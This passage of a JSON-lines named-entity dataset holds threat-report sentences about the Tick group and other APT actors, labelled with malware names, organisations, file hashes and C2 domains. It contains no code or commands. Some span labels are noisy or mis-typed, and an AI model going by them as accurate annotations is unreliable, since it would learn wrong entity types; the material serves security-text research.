, Jordan , and Germany .", "spans": {}, "info": {"id": "aptner_train_002760", "source": "aptner_train"}} {"text": "Tick Group Continues Attacks .", "spans": {"Organization: Tick": [[0, 4]]}, "info": {"id": "aptner_train_002761", "source": "aptner_train"}} {"text": "The \" Tick \" group has conducted cyber espionage attacks against organizations in the Republic of Korea and Japan for several years .", "spans": {"Organization: Tick": [[6, 10]]}, "info": {"id": "aptner_train_002762", "source": "aptner_train"}} {"text": "The group is known to use custom malware called Daserf , but also employs multiple commodity and custom tools , exploits vulnerabilities , and uses social engineering techniques .", "spans": {"Malware: Daserf": [[48, 54]], "System: multiple commodity": [[74, 92]], "System: custom tools": [[97, 109]], "Vulnerability: vulnerabilities": [[121, 136]], "System: social engineering techniques": [[148, 177]]}, "info": {"id": "aptner_train_002764", "source": "aptner_train"}} {"text": "With multiple tools and anonymous infrastructure , they are running longstanding and persistent attack campaigns .", "spans": {"System: multiple tools": [[5, 19]], "System: anonymous infrastructure": [[24, 48]]}, "info": {"id": "aptner_train_002765", "source": "aptner_train"}} {"text": "We have observed that the adversary has repeatedly attacked a high-profile target in Japan using multiple malware families for the last three years .", "spans": {"Malware: malware families": [[106, 122]]}, "info": {"id": "aptner_train_002766", "source": "aptner_train"}} {"text": "Symantec was first to publicly report on Tick , followed by LAC in 2016 .", "spans": {"Organization: Symantec": [[0, 8]], "Organization: Tick": [[41, 45]], "Organization: LAC": [[60, 63]]}, "info": {"id": "aptner_train_002767", "source": "aptner_train"}} {"text": "These reports discussed the group ’s malware , Daserf ( a.k.a Muirim or Nioupale ) and some additional downloader programs .", "spans": {"Malware: Daserf": [[47, 
53]], "Malware: Muirim": [[62, 68]], "Malware: Nioupale": [[72, 80]]}, "info": {"id": "aptner_train_002768", "source": "aptner_train"}} {"text": "Though Daserf wasn’t a popular attack tool when the two reports were published , it dates back to at least 2011 .", "spans": {"Malware: Daserf": [[7, 13]]}, "info": {"id": "aptner_train_002769", "source": "aptner_train"}} {"text": "Using AutoFocus , we were able to identify the link among Daserf and two other threats , 9002 and Invader .", "spans": {"Organization: AutoFocus": [[6, 15]], "Malware: Daserf": [[58, 64]], "Malware: 9002": [[89, 93]], "Malware: Invader": [[98, 105]]}, "info": {"id": "aptner_train_002770", "source": "aptner_train"}} {"text": "These threats shared infrastructure between July 2012 and April 2013 .", "spans": {}, "info": {"id": "aptner_train_002771", "source": "aptner_train"}} {"text": "Invader ( a.k.a Kickesgo ) is a backdoor that injects its main code into a legitimate process , such as explorer.exe , and has the following functions :", "spans": {"Malware: Invader": [[0, 7]], "Malware: Kickesgo": [[16, 24]], "Indicator: explorer.exe": [[104, 116]]}, "info": {"id": "aptner_train_002772", "source": "aptner_train"}} {"text": "Logs keystrokes and mouse movement , captures screenshots , opens a cmd.exe shell , enumerates processes , executes programs , removes itself , and enumerates all open TCP and UDP ports .", "spans": {"Indicator: cmd.exe": [[68, 75]]}, "info": {"id": "aptner_train_002773", "source": "aptner_train"}} {"text": "9002 is the infamous RAT frequently seen in targeted attacks reported by various security vendors , including Palo Alto Networks .", "spans": {"Malware: 9002": [[0, 4]], "Organization: Palo Alto Networks": [[110, 128]]}, "info": {"id": "aptner_train_002774", "source": "aptner_train"}} {"text": "Interestingly , the C2 servers linking 9002 to Daserf were described in the report of an Adobe Flash Zero-day attack from FireEye in 2013 .", "spans": {"System: C2": [[20, 22]], "Malware: 9002": 
[[39, 43]], "Malware: Daserf": [[47, 53]], "System: Adobe Flash": [[89, 100]], "Vulnerability: Zero-day": [[101, 109]], "Organization: FireEye": [[122, 129]]}, "info": {"id": "aptner_train_002775", "source": "aptner_train"}} {"text": "These domains were registered through privacy protection services in 2008 and 2011 .", "spans": {}, "info": {"id": "aptner_train_002776", "source": "aptner_train"}} {"text": "krjregh.sacreeflame.com lywja.healthsvsolu.com .", "spans": {"Indicator: krjregh.sacreeflame.com": [[0, 23]], "Indicator: lywja.healthsvsolu.com": [[24, 46]]}, "info": {"id": "aptner_train_002777", "source": "aptner_train"}} {"text": "Though we don’t know the targets of these malware samples at the time of writing this article , we suspect the same group is behind these threats for a number of reasons .", "spans": {}, "info": {"id": "aptner_train_002778", "source": "aptner_train"}} {"text": "The samples of Daserf that shared infrastructure were submitted to VirusTotal only from Japan multiple times in 2013 .", "spans": {"Malware: Daserf": [[15, 21]], "Organization: VirusTotal": [[67, 77]]}, "info": {"id": "aptner_train_002779", "source": "aptner_train"}} {"text": "As noted in a later section , another Invader sample shared different C2 servers with Daserf .", "spans": {"Malware: Invader": [[38, 45]], "System: C2": [[70, 72]], "Malware: Daserf": [[86, 92]]}, "info": {"id": "aptner_train_002780", "source": "aptner_train"}} {"text": "Symantec reported that Tick exploited additional Adobe Flash and Microsoft Office vulnerabilities .", "spans": {"Organization: Symantec": [[0, 8]], "Organization: Tick": [[23, 27]], "System: Adobe Flash": [[49, 60]], "System: Microsoft Office": [[65, 81]], "Vulnerability: vulnerabilities": [[82, 97]]}, "info": {"id": "aptner_train_002781", "source": "aptner_train"}} {"text": "SecureWorks said the adversary group is abusing a previously undisclosed vulnerability in a Japanese software asset management system on endpoints .", "spans": 
{"Organization: SecureWorks": [[0, 11]], "Vulnerability: previously undisclosed vulnerability": [[50, 86]]}, "info": {"id": "aptner_train_002782", "source": "aptner_train"}} {"text": "Therefore , Tick or its digital quartermaster is capable of deploying new and unique exploits .", "spans": {"Organization: Tick": [[12, 16]]}, "info": {"id": "aptner_train_002783", "source": "aptner_train"}} {"text": "In July 2016 , we identified a compromised website in Japan that was hosting a Daserf variant .", "spans": {"Malware: Daserf variant": [[79, 93]]}, "info": {"id": "aptner_train_002784", "source": "aptner_train"}} {"text": "The web server was also a C2 server for another threat , Minzen ( a.k.a XXMM , Wali , or ShadowWali ) .", "spans": {"System: C2": [[26, 28]], "Malware: Minzen": [[57, 63]], "Malware: XXMM": [[72, 76]], "Malware: Wali": [[79, 83]], "Malware: ShadowWali": [[89, 99]]}, "info": {"id": "aptner_train_002785", "source": "aptner_train"}} {"text": "The threat often uses compromised web servers in Japan and the Republic of Korea .", "spans": {}, "info": {"id": "aptner_train_002786", "source": "aptner_train"}} {"text": "As Kaspersky and Cybereason recently posted , Minzen is a modular malware that has both 32-bit and 64-bit components in its resource section or configuration data in its body .", "spans": {"Organization: Kaspersky": [[3, 12]], "Organization: Cybereason": [[17, 27]], "Malware: Minzen": [[46, 52]]}, "info": {"id": "aptner_train_002787", "source": "aptner_train"}} {"text": "One of the Minzen samples ( SHA256 : 9374040a9e2f47f7037edaac19f21ff1ef6a999ff98c306504f89a37196074a2 ) found in the Republic of Korea in December 2016 installs a simple backdoor module as a final payload on a compromised computer .", "spans": {"Malware: Minzen": [[11, 17]], "Indicator: 9374040a9e2f47f7037edaac19f21ff1ef6a999ff98c306504f89a37196074a2": [[37, 101]]}, "info": {"id": "aptner_train_002788", "source": "aptner_train"}} {"text": "It opens a TCP port and receives 
commands from a remote attacker .", "spans": {}, "info": {"id": "aptner_train_002789", "source": "aptner_train"}} {"text": "According to the debug path in the body , the author of the tool called it “ NamelessHdoor , ” and its internal version is identified as “ V1.5. ”", "spans": {"Malware: NamelessHdoor": [[77, 90]]}, "info": {"id": "aptner_train_002790", "source": "aptner_train"}} {"text": "The payload is based on “ Nameless Backdoor ” which has been publicly available for more than ten years .", "spans": {"Malware: Nameless Backdoor": [[26, 43]]}, "info": {"id": "aptner_train_002791", "source": "aptner_train"}} {"text": "The oldest code we could identify had been hosted on a famous Chinese source code sharing site since 2005 .", "spans": {}, "info": {"id": "aptner_train_002792", "source": "aptner_train"}} {"text": "The author of the NamelessHdoor appears to have created additional versions of the Nameless Backdoor by removing unnecessary functions and adding open-source DLL injection code from ReflectiveDLLLoader .", "spans": {"Malware: the NamelessHdoor": [[14, 31]], "Malware: Nameless Backdoor": [[83, 100]], "System: DLL": [[158, 161]], "System: ReflectiveDLLLoader": [[182, 201]]}, "info": {"id": "aptner_train_002793", "source": "aptner_train"}} {"text": "There is minimal public information regarding the Nameless Backdoor , except for the interesting report from Cyphort in 2015 .", "spans": {"Malware: Nameless Backdoor": [[50, 67]], "Organization: Cyphort": [[109, 116]]}, "info": {"id": "aptner_train_002794", "source": "aptner_train"}} {"text": "The researcher of the company analyzed multiple threats , including Invader , Nioupale ( Daserf ) and Hdoor found in an attack against an Asian financial institution .", "spans": {"Malware: Invader": [[68, 75]], "Malware: Nioupale": [[78, 86]], "Malware: Hdoor": [[102, 107]]}, "info": {"id": "aptner_train_002795", "source": "aptner_train"}} {"text": "We examined the sample described in the report as Hdoor and found it ’s a 
previous version of the NamelessHdoor we discovered in the Minzen sample , but without support for DLL injection .", "spans": {"Malware: Hdoor": [[50, 55]], "Malware: NamelessHdoor": [[98, 111]], "System: DLL": [[173, 176]]}, "info": {"id": "aptner_train_002796", "source": "aptner_train"}} {"text": "It turned out that the DLL files we found are a custom variant of Gh0st RAT , and the EXE files download the RAT .", "spans": {"System: DLL": [[23, 26]], "Malware: Gh0st RAT": [[66, 75]]}, "info": {"id": "aptner_train_002797", "source": "aptner_train"}} {"text": "Since the source code is publicly available , Gh0st RAT has been used by multiple actors for years .", "spans": {"Malware: Gh0st RAT": [[46, 55]]}, "info": {"id": "aptner_train_002798", "source": "aptner_train"}} {"text": "The domain , softfix.co.kr was registered in 2014 .", "spans": {"Indicator: softfix.co.kr": [[13, 26]]}, "info": {"id": "aptner_train_002799", "source": "aptner_train"}} {"text": "One of the subdomains , news.softfix.co.kr was the C2 server of Daserf ( 9c7a34390e92d4551c26a3feb5b181757b3309995acd1f92e0f63f888aa89423 ) .", "spans": {"Indicator: news.softfix.co.kr": [[24, 42]], "System: C2": [[51, 53]], "Malware: Daserf": [[64, 70]], "Indicator: 9c7a34390e92d4551c26a3feb5b181757b3309995acd1f92e0f63f888aa89423": [[73, 137]]}, "info": {"id": "aptner_train_002800", "source": "aptner_train"}} {"text": "Another subdomain , bbs.softfix.co.kr was hosted on the same IP address as bbs.gokickes.com , which was reported as the C2 server of Invader by Cyphort .", "spans": {"Indicator: bbs.softfix.co.kr": [[20, 37]], "Indicator: bbs.gokickes.com": [[75, 91]], "System: C2": [[120, 122]], "Malware: Invader": [[133, 140]], "Organization: Cyphort": [[144, 151]]}, "info": {"id": "aptner_train_002801", "source": "aptner_train"}} {"text": "We also identified www.gokickes.com was the C2 of another Invader variant ( 57e1d3122e6dc88d9eb2989f081de88a0e6864e767281d509ff58834928895fb ) .", "spans": {"Indicator: 
www.gokickes.com": [[19, 35]], "System: C2": [[44, 46]], "Malware: Invader variant": [[58, 73]], "Indicator: 57e1d3122e6dc88d9eb2989f081de88a0e6864e767281d509ff58834928895fb": [[76, 140]]}, "info": {"id": "aptner_train_002802", "source": "aptner_train"}} {"text": "In addition to the infrastructure , the attacker also shared code .", "spans": {}, "info": {"id": "aptner_train_002803", "source": "aptner_train"}} {"text": "The Gh0st downloaders employ simple substitution ciphers for hiding strings .", "spans": {"Malware: Gh0st": [[4, 9]]}, "info": {"id": "aptner_train_002804", "source": "aptner_train"}} {"text": "We also identified another malware family , HomamDownloader , sharing some servers with Daserf .", "spans": {"Malware: HomamDownloader": [[44, 59]], "Malware: Daserf": [[88, 94]]}, "info": {"id": "aptner_train_002805", "source": "aptner_train"}} {"text": "An overview of the connections among these threats is shown below .", "spans": {}, "info": {"id": "aptner_train_002806", "source": "aptner_train"}} {"text": "HomamDownloader is a small downloader program with few interesting characteristics from a technical point of view .", "spans": {"Malware: HomamDownloader": [[0, 15]]}, "info": {"id": "aptner_train_002807", "source": "aptner_train"}} {"text": "HomamDownloader was discovered to be delivered by Tick via a spearphishing email .", "spans": {"Malware: HomamDownloader": [[0, 15]], "Organization: Tick": [[50, 54]], "System: email": [[75, 80]]}, "info": {"id": "aptner_train_002808", "source": "aptner_train"}} {"text": "The adversary crafted a credible email and attachment after understanding the targets and their behavior .", "spans": {"System: email": [[33, 38]]}, "info": {"id": "aptner_train_002809", "source": "aptner_train"}} {"text": "The email below was sent from a personal email account with a subject line of “ New Year Wishes on January 1st ” .", "spans": {"System: email": [[4, 9], [41, 46]]}, "info": {"id": "aptner_train_002810", "source": 
"aptner_train"}} {"text": "The message asked the recipient to rename the attachment extension from “ ._X_ ” to “ .exe ” and open it with the password specified in the email to view the Happy New Year eCard in the correct and polite language .", "spans": {"Indicator: ._X_": [[74, 78]], "Indicator: .exe": [[86, 90]], "System: email": [[140, 145]]}, "info": {"id": "aptner_train_002811", "source": "aptner_train"}} {"text": "In addition to the social engineering email technique , the attacker also applies a trick to the attachment .", "spans": {"System: email": [[38, 43]]}, "info": {"id": "aptner_train_002812", "source": "aptner_train"}} {"text": "The actor embedded malicious code into a resource section of a legitimate SFX file created by a file encryption tool , and modified the entry point of the program so that it jumps to the malicious code as soon as the SFX program starts .", "spans": {}, "info": {"id": "aptner_train_002813", "source": "aptner_train"}} {"text": "The malicious code drops HomamDownloader , then jumps back to the regular flow in the CODE section , which in turn asks the user for the password and decrypts the file .", "spans": {"Malware: HomamDownloader": [[25, 40]]}, "info": {"id": "aptner_train_002814", "source": "aptner_train"}} {"text": "Therefore , once a user executes the attachment and sees the SFX password dialog , the downloader dropped by the malicious code starts working even if the user clicks Cancel in the password window .", "spans": {}, "info": {"id": "aptner_train_002815", "source": "aptner_train"}} {"text": "Should the user become aware of the infection later , it may be difficult to find the cause because the original embedded file contained within the SFX is benign .", "spans": {}, "info": {"id": "aptner_train_002816", "source": "aptner_train"}} {"text": "Tick was spotted only last year , but the group has been actively and silently attacking various organizations in South Korea and Japan for a number of years .", "spans": 
{"Organization: Tick": [[0, 4]]}, "info": {"id": "aptner_train_002817", "source": "aptner_train"}} {"text": "While some of the group ’s tools , tactics , and procedures ( TTPs ) have been covered within this article , it is likely there is much that still remains uncovered .", "spans": {}, "info": {"id": "aptner_train_002818", "source": "aptner_train"}} {"text": "Daserf : 04080fbab754dbf0c7529f8bbe661afef9c2cba74e3797428538ed5c243d705a .", "spans": {"Malware: Daserf": [[0, 6]], "Indicator: 04080fbab754dbf0c7529f8bbe661afef9c2cba74e3797428538ed5c243d705a": [[9, 73]]}, "info": {"id": "aptner_train_002819", "source": "aptner_train"}} {"text": "Daserf : f8458a0711653071bf59a3153293771a6fb5d1de9af7ea814de58f473cba9d06 .", "spans": {"Malware: Daserf": [[0, 6]], "Indicator: f8458a0711653071bf59a3153293771a6fb5d1de9af7ea814de58f473cba9d06": [[9, 73]]}, "info": {"id": "aptner_train_002820", "source": "aptner_train"}} {"text": "Daserf : e8edde4519763bb6669ba99e33b4803a7655805b8c3475b49af0a49913577e51 .", "spans": {"Malware: Daserf": [[0, 6]], "Indicator: e8edde4519763bb6669ba99e33b4803a7655805b8c3475b49af0a49913577e51": [[9, 73]]}, "info": {"id": "aptner_train_002821", "source": "aptner_train"}} {"text": "Daserf : 21111136d523970e27833dd2db15d7c50803d8f6f4f377d4d9602ba9fbd355cd .", "spans": {"Malware: Daserf": [[0, 6]], "Indicator: 21111136d523970e27833dd2db15d7c50803d8f6f4f377d4d9602ba9fbd355cd": [[9, 73]]}, "info": {"id": "aptner_train_002822", "source": "aptner_train"}} {"text": "Daserf : 9c7a34390e92d4551c26a3feb5b181757b3309995acd1f92e0f63f888aa89423 .", "spans": {"Malware: Daserf": [[0, 6]], "Indicator: 9c7a34390e92d4551c26a3feb5b181757b3309995acd1f92e0f63f888aa89423": [[9, 73]]}, "info": {"id": "aptner_train_002823", "source": "aptner_train"}} {"text": "Invader : 0df20ccd074b722d5fe1358b329c7bdebcd7e3902a1ca4ca8d5a98cc5ce4c287 .", "spans": {"Malware: Invader": [[0, 7]], "Indicator: 0df20ccd074b722d5fe1358b329c7bdebcd7e3902a1ca4ca8d5a98cc5ce4c287": [[10, 74]]}, "info": 
{"id": "aptner_train_002824", "source": "aptner_train"}} {"text": "Invader : e9574627349aeb7dd7f5b9f9c5ede7faa06511d7fdf98804526ca1b2e7ce127e .", "spans": {"Malware: Invader": [[0, 7]], "Indicator: e9574627349aeb7dd7f5b9f9c5ede7faa06511d7fdf98804526ca1b2e7ce127e": [[10, 74]]}, "info": {"id": "aptner_train_002825", "source": "aptner_train"}} {"text": "Invader : 57e1d3122e6dc88d9eb2989f081de88a0e6864e767281d509ff58834928895fb . 9002 . 9002 . 9002 .", "spans": {"Malware: Invader": [[0, 7]], "Indicator: 57e1d3122e6dc88d9eb2989f081de88a0e6864e767281d509ff58834928895fb": [[10, 74]], "Malware: 9002": [[77, 81], [84, 88], [91, 95]]}, "info": {"id": "aptner_train_002826", "source": "aptner_train"}} {"text": "Minzen : 797d9c00022eaa2f86ddc9374f60d7ad92128ca07204b3e2fe791c08da9ce2b1 .", "spans": {"Malware: Minzen": [[0, 6]], "Indicator: 797d9c00022eaa2f86ddc9374f60d7ad92128ca07204b3e2fe791c08da9ce2b1": [[9, 73]]}, "info": {"id": "aptner_train_002827", "source": "aptner_train"}} {"text": "Minzen : 9374040a9e2f47f7037edaac19f21ff1ef6a999ff98c306504f89a37196074a2 .", "spans": {"Malware: Minzen": [[0, 6]], "Indicator: 9374040a9e2f47f7037edaac19f21ff1ef6a999ff98c306504f89a37196074a2": [[9, 73]]}, "info": {"id": "aptner_train_002828", "source": "aptner_train"}} {"text": "Minzen : 26727d139b593486237b975e7bdf93a8148c52d5fb48d5fe540a634a16a6ba82 .", "spans": {"Malware: Minzen": [[0, 6]], "Indicator: 26727d139b593486237b975e7bdf93a8148c52d5fb48d5fe540a634a16a6ba82": [[9, 73]]}, "info": {"id": "aptner_train_002829", "source": "aptner_train"}} {"text": "NamelessHdoor : dfc8a6da93481e9dab767c8b42e2ffbcd08fb813123c91b723a6e6d70196636f .", "spans": {"Malware: NamelessHdoor": [[0, 13]], "Indicator: dfc8a6da93481e9dab767c8b42e2ffbcd08fb813123c91b723a6e6d70196636f": [[16, 80]]}, "info": {"id": "aptner_train_002830", "source": "aptner_train"}} {"text": "Gh0stRAt Downloader : ce47e7827da145823a6f2b755975d1d2f5eda045b4c542c9b9d05544f3a9b974 .", "spans": {"Malware: Gh0stRAt Downloader": [[0, 
19]], "Indicator: ce47e7827da145823a6f2b755975d1d2f5eda045b4c542c9b9d05544f3a9b974": [[22, 86]]}, "info": {"id": "aptner_train_002831", "source": "aptner_train"}} {"text": "Gh0stRAt Downloader : e34f4a9c598ad3bb243cb39969fb9509427ff9c08e63e8811ad26b72af046f0c .", "spans": {"Malware: Gh0stRAt Downloader": [[0, 19]], "Indicator: e34f4a9c598ad3bb243cb39969fb9509427ff9c08e63e8811ad26b72af046f0c": [[22, 86]]}, "info": {"id": "aptner_train_002832", "source": "aptner_train"}} {"text": "Custom Gh0st : 8e5a0a5f733f62712b840e7f5051a2bd68508ea207e582a190c8947a06e26f40 .", "spans": {"Malware: Custom Gh0st": [[0, 12]], "Indicator: 8e5a0a5f733f62712b840e7f5051a2bd68508ea207e582a190c8947a06e26f40": [[15, 79]]}, "info": {"id": "aptner_train_002833", "source": "aptner_train"}} {"text": "Datper : 7d70d659c421b50604ce3e0a1bf423ab7e54b9df361360933bac3bb852a31849 .", "spans": {"Malware: Datper": [[0, 6]], "Indicator: 7d70d659c421b50604ce3e0a1bf423ab7e54b9df361360933bac3bb852a31849": [[9, 73]]}, "info": {"id": "aptner_train_002834", "source": "aptner_train"}} {"text": "HomamDownloader : a624d2cd6dee3b6150df3ca61ee0f992e2d6b08b3107f5b00f8bf8bcfe07ebe7 .", "spans": {"Malware: HomamDownloader": [[0, 15]], "Indicator: a624d2cd6dee3b6150df3ca61ee0f992e2d6b08b3107f5b00f8bf8bcfe07ebe7": [[18, 82]]}, "info": {"id": "aptner_train_002835", "source": "aptner_train"}} {"text": "C2 : lywjrea.gmarketshop.net .", "spans": {"System: C2": [[0, 2]], "Indicator: lywjrea.gmarketshop.net": [[5, 28]]}, "info": {"id": "aptner_train_002836", "source": "aptner_train"}} {"text": "C2 : krjregh.sacreeflame.com .", "spans": {"System: C2": [[0, 2]], "Indicator: krjregh.sacreeflame.com": [[5, 28]]}, "info": {"id": "aptner_train_002837", "source": "aptner_train"}} {"text": "C2 : psfir.sacreeflame.com .", "spans": {"System: C2": [[0, 2]], "Indicator: psfir.sacreeflame.com": [[5, 26]]}, "info": {"id": "aptner_train_002838", "source": "aptner_train"}} {"text": "C2 : lywja.healthsvsolu.com .", "spans": {"System: C2": [[0, 
2]], "Indicator: lywja.healthsvsolu.com": [[5, 27]]}, "info": {"id": "aptner_train_002839", "source": "aptner_train"}} {"text": "C2 : phot.healthsvsolu.com .", "spans": {"System: C2": [[0, 2]], "Indicator: phot.healthsvsolu.com": [[5, 26]]}, "info": {"id": "aptner_train_002840", "source": "aptner_train"}} {"text": "C2 : blog.softfix.co.kr .", "spans": {"System: C2": [[0, 2]], "Indicator: blog.softfix.co.kr": [[5, 23]]}, "info": {"id": "aptner_train_002841", "source": "aptner_train"}} {"text": "C2 : news.softfix.co.kr .", "spans": {"System: C2": [[0, 2]], "Indicator: news.softfix.co.kr": [[5, 23]]}, "info": {"id": "aptner_train_002842", "source": "aptner_train"}} {"text": "C2 : www.gokickes.com .", "spans": {"System: C2": [[0, 2]], "Indicator: www.gokickes.com": [[5, 21]]}, "info": {"id": "aptner_train_002843", "source": "aptner_train"}} {"text": "C2 : log.gokickes.com .", "spans": {"System: C2": [[0, 2]], "Indicator: log.gokickes.com": [[5, 21]]}, "info": {"id": "aptner_train_002844", "source": "aptner_train"}} {"text": "The group is responsible for the campaign known as Operation Wilted Tulip .", "spans": {}, "info": {"id": "aptner_train_002845", "source": "aptner_train"}} {"text": "Dark Caracal is threat group that has been attributed to the Lebanese General Directorate of General Security ( GDGS ) and has operated since at least 2012 .", "spans": {"Organization: Dark Caracal": [[0, 12]], "Organization: General Directorate of General Security": [[70, 109]], "Organization: GDGS": [[112, 116]]}, "info": {"id": "aptner_train_002846", "source": "aptner_train"}} {"text": "Darkhotel  is a threat group that has been active since at least 2004 .", "spans": {"Organization: Darkhotel ": [[0, 10]]}, "info": {"id": "aptner_train_002847", "source": "aptner_train"}} {"text": "The group has conducted activity on hotel and business center Wi‑Fi and physical connections as well as peer-to-peer and file sharing networks .", "spans": {}, "info": {"id": "aptner_train_002848", 
"source": "aptner_train"}} {"text": "The actors have also conducted spearphishing .", "spans": {}, "info": {"id": "aptner_train_002849", "source": "aptner_train"}} {"text": "Unknown .", "spans": {}, "info": {"id": "aptner_train_002850", "source": "aptner_train"}} {"text": "They appear to focus on targeting individuals of interest to Iran who work in academic research , human rights , and media , with most victims having been located in Iran , the US , Israel , and the UK .", "spans": {}, "info": {"id": "aptner_train_002852", "source": "aptner_train"}} {"text": "Charming Kitten usually tries to access private email and Facebook accounts , and sometimes establishes a foothold on victim computers as a secondary objective .", "spans": {"Organization: Charming Kitten": [[0, 15]], "System: email": [[48, 53]], "Organization: Facebook": [[58, 66]]}, "info": {"id": "aptner_train_002853", "source": "aptner_train"}} {"text": "The group 's TTPs overlap extensively with another group , O Magic Hound , resulting in reporting that may not distinguish between the two groups' activities .", "spans": {"Organization: Magic Hound": [[61, 72]]}, "info": {"id": "aptner_train_002854", "source": "aptner_train"}} {"text": "Cleaver : Threat Group 2889 , TG-2889 .", "spans": {"Organization: Cleaver": [[0, 7]], "Organization: Threat Group 2889": [[10, 27]], "Organization: TG-2889": [[30, 37]]}, "info": {"id": "aptner_train_002855", "source": "aptner_train"}} {"text": "Cleaver is a threat group that has been attributed to Iranian actors and is responsible for activity tracked as Operation Cleaver .", "spans": {"Organization: Cleaver": [[0, 7]]}, "info": {"id": "aptner_train_002856", "source": "aptner_train"}} {"text": "Strong circumstantial evidence suggests Cleaver is linked to Threat Group 2889 ( TG-2889 ) .", "spans": {"Organization: Cleaver": [[40, 47]], "Organization: Threat Group 2889": [[61, 78]], "Organization: TG-2889": [[81, 88]]}, "info": {"id": "aptner_train_002857", "source": 
"aptner_train"}} {"text": "Cobalt Group : Cobalt Gang , Cobalt Spider .", "spans": {"Organization: Cobalt Group": [[0, 12]], "Organization: Cobalt Gang": [[15, 26]], "Organization: Cobalt Spider": [[29, 42]]}, "info": {"id": "aptner_train_002858", "source": "aptner_train"}} {"text": "The group has conducted intrusions to steal money via targeting ATM systems , card processing , payment systems and SWIFT systems .", "spans": {"System: ATM systems": [[64, 75]], "System: payment systems": [[96, 111]], "System: SWIFT systems": [[116, 129]]}, "info": {"id": "aptner_train_002860", "source": "aptner_train"}} {"text": "Cobalt Group has mainly targeted banks in Eastern Europe , Central Asia , and Southeast Asia .", "spans": {"Organization: Cobalt Group": [[0, 12]]}, "info": {"id": "aptner_train_002861", "source": "aptner_train"}} {"text": "One of the alleged leaders was arrested in Spain in early 2018 , but the group still appears to be active .", "spans": {}, "info": {"id": "aptner_train_002862", "source": "aptner_train"}} {"text": "The group has been known to target organizations in order to use their access to then compromise additional victims .", "spans": {}, "info": {"id": "aptner_train_002863", "source": "aptner_train"}} {"text": "Reporting indicates there may be links between O Cobalt Group and both the malware O Carbanak and the group O Carbanak .", "spans": {"Organization: Cobalt Group": [[49, 61]], "Malware: Carbanak": [[85, 93]], "Organization: Carbanak": [[110, 118]]}, "info": {"id": "aptner_train_002864", "source": "aptner_train"}} {"text": "Taidoor is a threat group that has operated since at least 2009 and has primarily targeted the Taiwanese government .", "spans": {"Organization: Taidoor": [[0, 7]], "Organization: Taiwanese government": [[95, 115]]}, "info": {"id": "aptner_train_002865", "source": "aptner_train"}} {"text": "TEMP.Veles : XENOTIME .", "spans": {"Organization: TEMP.Veles": [[0, 10]], "Organization: XENOTIME": [[13, 21]]}, "info": {"id": 
"aptner_train_002866", "source": "aptner_train"}} {"text": "TEMP.Veles is a Russia based threat group that has targeted critical infrastructure .", "spans": {"Organization: TEMP.Veles": [[0, 10]]}, "info": {"id": "aptner_train_002867", "source": "aptner_train"}} {"text": "The group has been observed utilizing TRITON , a malware framework designed to manipulate industrial safety systems .", "spans": {"Malware: TRITON": [[38, 44]]}, "info": {"id": "aptner_train_002868", "source": "aptner_train"}} {"text": "The White Company is a likely state-sponsored threat actor with advanced capabilities .", "spans": {"Organization: The White Company": [[0, 17]]}, "info": {"id": "aptner_train_002869", "source": "aptner_train"}} {"text": "From 2017 through 2018 , the group led an espionage campaign called Operation Shaheen targeting government and military organizations in Pakistan .", "spans": {"Organization: government": [[96, 106]], "Organization: military organizations": [[111, 133]]}, "info": {"id": "aptner_train_002870", "source": "aptner_train"}} {"text": "Molerats : Operation Molerats , Gaza Cybergang .", "spans": {"Organization: Molerats": [[0, 8]], "Organization: Operation Molerats": [[11, 29]], "Organization: Gaza Cybergang": [[32, 46]]}, "info": {"id": "aptner_train_002871", "source": "aptner_train"}} {"text": "Molerats is a politically-motivated threat group that has been operating since 2012 .", "spans": {"Organization: Molerats": [[0, 8]]}, "info": {"id": "aptner_train_002872", "source": "aptner_train"}} {"text": "The group 's victims have primarily been in the Middle East , Europe , and the United States .", "spans": {}, "info": {"id": "aptner_train_002873", "source": "aptner_train"}} {"text": "MuddyWater : Seedworm , TEMP.Zagros .", "spans": {"Organization: MuddyWater": [[0, 10]], "Organization: Seedworm": [[13, 21]], "Organization: TEMP.Zagros": [[24, 35]]}, "info": {"id": "aptner_train_002874", "source": "aptner_train"}} {"text": "MuddyWater is an Iranian threat 
group that has primarily targeted Middle Eastern nations , and has also targeted European and North American nations .", "spans": {"Organization: MuddyWater": [[0, 10]]}, "info": {"id": "aptner_train_002875", "source": "aptner_train"}} {"text": "The group 's victims are mainly in the telecommunications , government ( IT services ) , and oil sectors .", "spans": {"Organization: telecommunications": [[39, 57]], "Organization: government": [[60, 70]], "Organization: IT services": [[73, 84]], "Organization: oil sectors": [[93, 104]]}, "info": {"id": "aptner_train_002876", "source": "aptner_train"}} {"text": "Activity from this group was previously linked to FIN7 , but the group is believed to be a distinct group possibly motivated by espionage .", "spans": {"Organization: FIN7": [[50, 54]]}, "info": {"id": "aptner_train_002877", "source": "aptner_train"}} {"text": "Naikon is a threat group that has focused on targets around the South China Sea .", "spans": {"Organization: Naikon": [[0, 6]]}, "info": {"id": "aptner_train_002878", "source": "aptner_train"}} {"text": "The group has been attributed to the Chinese People ’s Liberation Army ’s ( PLA ) Chengdu Military Region Second Technical Reconnaissance Bureau ( Military Unit Cover Designator 78020 ) .", "spans": {"Organization: Chinese People ’s Liberation Army ’s": [[37, 73]], "Organization: PLA": [[76, 79]], "Organization: Chengdu Military Region Second Technical Reconnaissance Bureau": [[82, 144]], "Organization: Military Unit Cover Designator 78020": [[147, 183]]}, "info": {"id": "aptner_train_002879", "source": "aptner_train"}} {"text": "While Naikon shares some characteristics with APT30 , the two groups do not appear to be exact matches .", "spans": {"Organization: Naikon": [[6, 12]], "Organization: APT30": [[46, 51]]}, "info": {"id": "aptner_train_002880", "source": "aptner_train"}} {"text": "APT39 : Chafer .", "spans": {"Organization: APT39": [[0, 5]], "Organization: Chafer": [[8, 14]]}, "info": {"id": 
"aptner_train_002881", "source": "aptner_train"}} {"text": "APT39 is Iranian cyber espionage group that has been active since at least 2014 .", "spans": {"Organization: APT39": [[0, 5]]}, "info": {"id": "aptner_train_002882", "source": "aptner_train"}} {"text": "They have targeted the telecommunication and travel industries to collect personal information that aligns with Iran 's national priorities .", "spans": {}, "info": {"id": "aptner_train_002883", "source": "aptner_train"}} {"text": "APT41 is a group that carries out Chinese state-sponsored espionage activity in addition to financially motivated activity .", "spans": {"Organization: APT41": [[0, 5]]}, "info": {"id": "aptner_train_002884", "source": "aptner_train"}} {"text": "APT41 has been active since as early as 2012 .", "spans": {"Organization: APT41": [[0, 5]]}, "info": {"id": "aptner_train_002885", "source": "aptner_train"}} {"text": "The group has been observed targeting healthcare , telecom , technology , and video game industries in 14 countries .", "spans": {}, "info": {"id": "aptner_train_002886", "source": "aptner_train"}} 